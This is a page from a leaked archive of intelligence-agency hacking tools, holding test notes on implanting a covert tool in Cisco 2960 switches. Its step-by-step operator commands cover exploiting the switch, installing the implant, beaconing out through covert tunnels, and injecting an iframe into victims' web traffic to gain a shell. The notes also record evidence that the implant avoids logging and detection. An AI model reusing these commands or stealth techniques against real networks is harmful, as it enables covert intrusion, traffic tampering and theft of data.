Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
JQJTHRESHER Test Notes
3/4/2015 - User #76795
Followed README instructions to trigger HG. Opened and setup Listening window first, then followed steps to open and setup Trigger window. When I entered ./prep-ct.sh in the Trigger window, got the following message in the Listening window:
Bus error (core dumped) - spoke with User #76798/Xetron about this. He says this is because ./prep-ct.sh is only meant to be run once. It is in the README to run twice because the README assumes you are not triggering and listening on the same VM.
3/6/2015 - User #76795
Was trying different things with the Seeds host to get HG to call back without an explicit IP to impersonate. I edited the ifcfg-eth1 file on Seeds to remove the DOMAIN variable and then saved my changes to the file. Then I restarted network services on the Seeds host so my changes would take effect. Noticed that I could no longer ping the default gateway from the Seeds host. Logged into network gear to verifiy connections and found 3750G g1/0/11 in err-disable state with syslog message %ETHCTR-3-LOOP_BACK_DETECTED: Loopback detected on Gi1/0/11, putting Gi1/0/11 in err-disable state. I bounced the port to restore and it came up/up. I also check the TOR-SW-1 and found g1/0/3 in the same state. Bounced port to restore. Went back to ICON VMVirtual Machine to attempt to trigger again and now Trigger packets are not successful, where they were before. Ran tcpdump on the Seeds host that is the destination for the trigger packet and it actually does receive the trigger packet. HG is no longer picking up the trigger packet. Reloaded 2960S to reinstall HG, and without HG installed, ports no longer to into err-disable state when I issue service network restart on Seeds. Successfully re-attacked with HG and still do not see the err-disable issue.
Progress / Notes
- TR team has performed initial review of configuration and Ops provided diagrams
- TR team is moving required VMs at this time
- Created Blot-Proxy, Blot-Onslaught, Blot-CoverWeb, ICON-CutThroat VMs. Copied Fedora10-hg2960-Seeds VMVirtual Machine from NDBNetwork Devices Branch Lab to use for seed traffic.
- Built test network with 2960S-24TS-L target switch, 3750G-24T Router and 3 2960-24TT-L switches.
- Upgraded IOSApple operating system for small devices on target 2960S switch to c2960s-universalk9-mz.122-55.SE7.bin. Updated confiugration to match config obtained from COG.
- Uploaded Aquaman delivery package to ICON-CutThroat VMVirtual Machine and installed in /home/ubuntu.
- Successfully attacked target 2960S switch with SSHIAC and installed Hun-Grrr. Note:
- On ICON-CutThroat VMVirtual Machine - had to move to Devlan temporarily to download the ia32-lib from the repo in order for SSHIAC to run
- Must enable the root account and su - root in each window you use when you attack with SSHIAC and use CutThroat
- Modified Seeds scripts on Fedora10-hg2960-Seeds VMVirtual Machine to generate ICMP/ARP, DNSDomain Name System and HTTPHypertext Transfer Protocol traffic in our test network.
- Established comms between Hun-Grrr and ICON-Cuthroat VM.
- Used beacon get_current_trigger_number and beacon set_current_trigger_number to make sure HG trigger sequence number was correct
- Had successful trigger packets however did not receive a callback
- User #76794/Xteron recommended to use beacon call_me_back https 443 -ii 172.31.255.2 and then finally comms came up, successful SSLSecure Socket Layer handshake in listening window.
- Created new WebServer VMVirtual Machine to use as web destination for seed traffic - 172.20.13.25.
- Created new BINDDNSDomain Name System server software DNSDomain Name System server VMVirtual Machine to resolve WebServer domain. New BINDDNSDomain Name System server software server has google.com, cnn.com and blot.com zones.
- IXIA added to the topology for traffic generation. Port 11 on IXIA to 0/1 on 3750 and IXIA Port 20 to 2960S 1/0/24
- Spoke with BARTWELL and discussed network topology and CONOP. We will need to update our testbed architecture to more closely match operational network.
- Installed Flux on FluxHost VM
- Copied Windex and Windex Target VMs to Test Range from NDBNetwork Devices Branch lab for use in SMITE testing
- Re-configured topology based on latest 2960 configs from BARTWELL.
- Fixed issue with Seeds traffic - added second DNSDomain Name System server and moved both DNSDomain Name System servers and Web server into public IP space. HG comms now established without specifying a host to impersonate.
- Successfully tested HG SMITE functionality using Windex-Victim-WinXPProSP3 (192.168.21.11), Windex (X.X.X.XX (LVLT-GOGL-8-8-8[US])), and our WebServer (X.X.X.XX (LVLT-GOGL-8-8-8[US])).
- User #76796/Xetron recommends always using the -bc and -bk flags when creating the mitm rule. This bypasses compression and chunking, and SMITE did not work in our test scenario without these flags.
- User #76797/Xetron noted that the iframe is injected after the <body> tag, and if the body tag is split into two packets, HG will not add the iframe
mitm create http_iframe 192.168.21.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
- Installed 12.2(50)SE5 on 2960#3 for use in testing Tunnel
- Copied RANCID VMVirtual Machine from NDBNetwork Devices Branch Lab up to TestRange and configured for use on JQJTHRESHER testing
- Reviewed Test Plan with team
- Discussed CONOPConcealed Operation of use of Flux with Dualor Tunnel with Operator
- Implanted 2960#3 with aquaman-3h survey delivery of HG and established comms from ICON-CT.
- Completed the following Smoke Tests against the target 2960-S:
- Attack with SSHIAC
- SSHIAC produced the following out on CutThroat during install - LG EC-125 DHDiffie-Hellman encryption EC-60 EC-159 M
- Five second CPU on Target 2960-S hit 66% as a high during the SSHIAC attack, One minute - 22%, Five minute - 11%
- No commands seen in history
- No syslog messages generated
- Memory used increased by ~50k
- Installed HG - Aquaman-5h
- Installed with no delay set between packets
- Five second CPU hit 25% during install - note this is with 0 delay between packets
- Memory used increased by 2.8M after install from baseline
- No syslog messages generated
- Establish Comms with ICON-CT
- Five second CPU hit 19% during SSLSecure Socket Layer Handshake with ICON-CT
- No significant change to memory used (~1k)
- SMITE capability
- Successfully injected an Iframe into a web request and established a shell term connection with Windex
- Filter applied: mitm create http_iframe 192.168.21.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
- Note that -bc and -bk flags aree recommended by User #76799/Xetron for standard use because they offer the best chance of success. These flags will bypass compression and chunking, and in fact SMITE does not work in our test environment without these flags configured.
- Five second CPU did not change from baseline - no noticeable spike
- No syslog messages generated.
- Took two screenshots - one of windex shellterm connection and one of victim source code showing Iframe for Test Report
- CI Test
- Used RANCID to compare configuration of Target 2960-S before any testing and configuration after previous smoke tests completed - RANCID found no change
- There were CPU spikes during SSHIAC and HG install, however these are known. Need to confirm our CPU spikes are within expected levels.
- There was a change in the memory used after HG install, need to confirm if this is expected and within norms.
- Need to eyeball the output from show-tech from before and after to look for any anamolies - found output from show controllers - line sw forwarding is 0 untile HG installed, at which point it begins incrementing
- additional things to track down from sh tech - exec process, remote command vtp, show stacks - difference in processes listed
- Found no change to files or file sizes on file system
- Note that there is no "test platform debugger dumpmem" command available on this 2960-S. Based on PW's Kingpin test report, this is the only IOSApple operating system for small devices (except ROMMONRead-Only Memory Monitor Cisco bootstrap program commands) that will allow inspection of HG memory.
- Time permitting could perform additional hidden commands
- Attack with SSHIAC
- Completed the following Performance Tests against the target 2960-S
- Used IXIA Breaking Point to generate traffic and establish a baseline performance for the 2960-S. IXIA cabled to 2960-S (g1/0/24) on one side and 3750G (g1/01/) on the other. Traffic configured as follows:
- AppSim test component with BreakingPoint-Enterprise traffic profile
- Maximum bandwidth 75Mbps (while IXIA connects to Gigabit ports, the link between the IXIA and the 3750G is FastEthernet)
- 20 simulated hosts on 192.168.0.0/25 (VLANVirtual Local Area Network 1)
- 50 simulated hosts on 192.168.21.0/24 (VLANVirtual Local Area Network 21)
- During a 1 hour Baseline test without HG installed, target 2960-S one minute and five minute CPU Utilization remained steady at 6%. Five second CPU had small spikes with a maximum of 39%.
- During 30 minute Performance test with HG installed, target 2960-S CPU recorded higher results than the baseline without HG:
- During SSHIAC attack, five second CPU had spikes to 57% and 54% for two minutes in row during SSHIAC attack, and one minute CPU was observed as high as 21% on show proc cpu sorted, and shows 30% on a show proc cpu history
- During HG install, five second CPU spiked to 28%
- During HG SSLSecure Socket Layer handshake with ICON-CT, five second CPU spiked to 18%
- Once HG was installed and comms established, CPU levels returned to what was observed during Baseline performance test without HG - one minute and five minute CPU levels at 6%, largest value for five second CPU was 9%.
- No significant change to CPU observed from Baseline during successful SMITE attack - largest five second CPU spike observed was 9%.
- Used IXIA Breaking Point to generate traffic and establish a baseline performance for the 2960-S. IXIA cabled to 2960-S (g1/0/24) on one side and 3750G (g1/01/) on the other. Traffic configured as follows:
- Samsonite Test Case - Uninstall HG and re-attack
- Reloaded 2960-S to start with a clean target device
- Attacked with SSHIAC, installed HG and established comms
- Attempted uninstall hg command device uninstall_hg - this command fails with error that says you must use -f flag
- Attempted uninstall hg command device uninstall_hg -f - then typed yes to confirm, result success.
- Checked used memory on the target 2960-S and the memory has gone back to down normal level without HG installed (may be slight difference, need to do the math), no syslog messages, no CPU spike
- Re-attacked using SSHIAC, installed HG, established HG comms - no anomalies
- Uninstalled HG again using device uninstall_hg -f - no anomalies
- No syslogs
- Used memory back to normal - could check math to find a small difference
- Samsonite Test Case - Dropped connection during HG install
- Reloaded 2960-S to start with a clean target device
- Added 1 second of delay to HG upload in remote configuration file
- Attacked with SSHIAC
- Entered hg_start and after just a few chunks were sent, shut int g1/0/11 via console connection on 2960-S to simulate network outage
- ICON-CT reported HG install failed
- No syslog messages from switch
- Used memory still shows higher than it should, but not as high as if HG were installed - 27265180 (b)
- Issued no shut on 2960-S interface g1/0/11 to re-enable the connection
- Entered hg_start on ICON-CT and HG successfully uploaded - used memory after successful install - 29607324 (b)
- Samsonite Test Case - Attempt to install HG when HG already installed
- Cannot initiate hg_start again via remote - reports comms failure
- Attempted to re-attack with SSHIAC - seemed to go through normal SSHIAC install process, however at the end of the install, could not establish comms with remote
- Broad didn't work
- hg_start fails
- Attempted to re-establish HG comms and that was successful
- Samsonite Test Case - Enable MITMMan-In-The-Middle attack rule and execute system administrator commands
- Enabled the SMITE MITMMan-In-The-Middle attack rule used above in HG
- Performed the following with no anomalies observed
- Cleared log buffer
- Disable/re-enable logging
- Multiple show commands - mac-address table, memory, proc cpu, proc cpu hist, log,run
- Write mem
- Add/delete a user
- Add/delete a VLAN
- Verified that SMITE works by web browsing from Victim VMVirtual Machine - collected output from Wireshark running on Victim VMVirtual Machine which shows Iframe
- Samsonite Test Case - Issue Cisco "test crash" command to test crash and generate a crashinfo
- With HG installed, issued test crash and selected reason as software forced crash
- Saved output of crashinfo file
- Saved log messages seen upon reboot of switch in log buffer
- Memory used had returned to normal levels for no HG, controller counters for sw forwarding back to 0
- Re-attacked with SSHIAC and installed HG and established HG comms successfully after test crash - with 1 second delay the five second CPU during HG install spiked to a max of 19%
- Without HG installed, repeated test crash - need to compare crashinfo
- Reloaded 2960-S to remove HG
- Issued "test crash" command with software forced crash as reason
- Saved output of crashinfo file
- Saved syslog messages seen up reboot of switch in log buffer - log messages are the same as seen on test crash with HG
- With HG installed, issued test crash and selected reason as software forced crash
- Samsonite Test Case - Perform core dump of 2960-S
- Performed a write core and saved to TFTPFile transfer software server - both before and after HG install.
- Need to compare these files
- Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960
- Updated 2960#1 to 12.2(50)SE5 and implanted with Aquaman-3h delivery of HG
- Established comms with Aquaman-3h from ICON-CT on port 443
- Disabled setting in Aquaman-3h HG tunnel which will disable the tunnel if the tap IP becomes active
- Edit hg/config/tunnel.ini and change DetectTAPSrcTraffic=Yes to No
- From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = Yes
- From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg tunnel.ini and note in the output that DetectTAPSrcTraffic has been changed to No
- From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = No
- From Aquaman-3h CutThroat, type file put cfs/000000004B8FAF63.cfg default:000000004B8FAF63.cfg in order to load the new setting up to HG
- From Aquaman-3h CutThroat, type module restart default:CovertTunnel.mod to restart the module
- This did not work initially and Xetron is aware of this problem. To fix, try restarting again, and run ilm refresh.
- Establish Dualor tunnel with tap IP 192.168.0.100
- From /hg/tools/dualor/linux, run ./Dualor .../configs/dualor-endpoint.ini and note that you get a message that CTCounter Terrorism is listening on port 444
- From Aquaman-3h CutThroat, run tun init tools/dualor/config/dualor-callback.ini and note that the SSLSecure Socket Layer session establishes
- Note that on ICON-CT VMVirtual Machine you know have a new interface called tap0 with an iP 192.168.0.110
- Add a route to ICON-CT for 192.168.21.0/24 to use tap0 interface - route add -net 192.168.21.0/24 dev tap0
- Move to Aquaman-5h setup - Edit aquaman-5h.txt Interface value under general settings to tap0, and set CommsH port to 445
- Establish HG comms using "beacon call_base_back https 192.168.0.110 445"
- Comms successfully established through Aquaman-3h tunnel
- Configured mitm rule for SMITE as in tests above and successfully exploited Victim VMVirtual Machine and read secrets.txt from Windex
- Samsonite Test Case - Create MITMMan-In-The-Middle attack rule for SMITE multiple times
- Created the MITMMan-In-The-Middle attack rule twice in a row - command successful both times and two identical rules present in mitm show output
- Created a third identical MITMMan-In-The-Middle attack rule - now there are three identical MITMMan-In-The-Middle attack rules
- Iframe injection on Victim VMVirtual Machine successful - only 1 Iframe injected
- Deleted the two additional rules and added a rule with same filter settings except different iframe string - only one iframe injected and it is for lowest numbered rule
- Deleted the lowest numbered rule so now only 1 rule applied - iframe is injected that matches remaining rule
- Noticed that in our test setup HTMLHypertext Markup Language we have two body tags, and we actually get two iframes injected - one after each body tag, which results in two shellterm connection ids in Windex
- When multiple MITMMan-In-The-Middle attack rules are present for the same traffic, lowest numbered rule is the action performed
- Samsonite Test Case - Reload FilterBroker.mod while mitm rule enabled
- Created a mitm rule and verified functionality by viewing source on the Victim VM
- On CutThroat session, entered module restart default:FilterBroker.mod
- Issued module show and saw two copies running - one status ModuleStopped, one status ModuleRunning
- Issued ilm refresh to attempt to clear the old copy of FilterBroker - however two copies still present in module show
- Ran mitm show and found no rules - restarting the module had deleted our rule
- Re-added a mitm rule and verified functionality by checking for the Iframe on Victim VM
- Checked module show and found that now, only one copy - status ModuleRunning - is present
- Installed new 2960-S with PoE
- Smoke Test - Install Aquaman-5h on PoE 2960-S
- Attack 2960-S with SSHIAC
- Five second CPU hit 58% during SSHIAC
- Observed same error codes in SSHIAC output as with non PoE 2960-S
- Install HG on 2960-S
- Five second CPU hit 26% during HG install
- No commands seen in history
- No syslog messages generated
- Used memory increased as expected
- Establish comms with ICON-CT
- Five second CPU spiked to 19% during SSLSecure Socket Layer handshake
- Successfully established HG comms
- Attack 2960-S with SSHIAC
- Smoke Test - Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960 (2960-S with PoE)
- Establish Dualor tunnel with tap IP 192.168.0.100
- From /hg/tools/dualor/linux, run ./Dualor .../configs/dualor-endpoint.ini and note that you get a message that CTCounter Terrorism is listening on port 444
- From Aquaman-3h CutThroat, run tun init tools/dualor/config/dualor-callback.ini and note that the SSLSecure Socket Layer session establishes
- Note that on ICON-CT VMVirtual Machine you know have a new interface called tap0 with an iP 192.168.0.110
- Add a route to ICON-CT for 192.168.21.0/24 to use tap0 interface - route add -net 192.168.21.0/24 dev tap0
- Move to Aquaman-5h setup - Edit aquaman-5h.txt Interface value under general settings to tap0, and set CommsH port to 445
- Establish HG comms using "beacon call_base_back https 192.168.0.110 445"
- Comms successfully established through Aquaman-3h tunnel
- Configured mitm rule for SMITE as in tests above and successfully exploited Victim VMVirtual Machine and read secrets.txt from Windex
- Establish Dualor tunnel with tap IP 192.168.0.100
- Observation - we have two <body> tags in our HTMLHypertext Markup Language on our web server for google.com. When SMITE injects an iframe, we actually get two iframes inserted, once after each body tag. This does not appear to cause any issues however we do get two session ids in shellterm.